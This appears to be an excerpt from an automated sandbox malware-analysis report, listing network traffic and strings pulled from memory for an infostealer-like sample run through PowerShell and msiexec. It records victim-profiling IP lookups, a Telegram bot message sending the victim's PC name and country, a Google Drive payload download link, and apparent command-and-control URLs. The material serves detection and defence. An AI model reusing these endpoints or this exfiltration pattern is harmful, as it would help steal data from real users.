            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: smtp.ionos.es
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 22 Oct 2024 14:12:18 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 22 Oct 2024 14:12:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3118373989.00000000242EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/C7T
            Source: powershell.exe, 00000004.00000002.2786466269.00000000078E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2786466269.000000000792C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
            Source: Sprawl.exe, Sprawl.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Sprawl.exe, Sprawl.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2747850355.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
            Source: powershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2725870722.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2754100744.0000000005371000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.ionos.es
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.geotrust.com0
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000002.00000002.2725870722.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2754100744.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000009.00000002.3378186894.0000000022AA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021F80000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000009.00000002.3362946153.0000000006F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.go
            Source: msiexec.exe, 00000008.00000002.3362918549.000000000657A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE
            Source: msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000008.00000002.3362918549.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2985704004.00000000065F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/U
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3362918549.00000000065D8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3362918549.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2985704004.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000708E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2747850355.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021EAC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.000000002295C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.000000002295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000009.00000002.3378186894.0000000022987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021EAC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021E67000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229CC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76$
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386020263.00000000242B0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386106679.00000000242E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3386170863.00000000242F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000710B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3384748715.0000000024B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
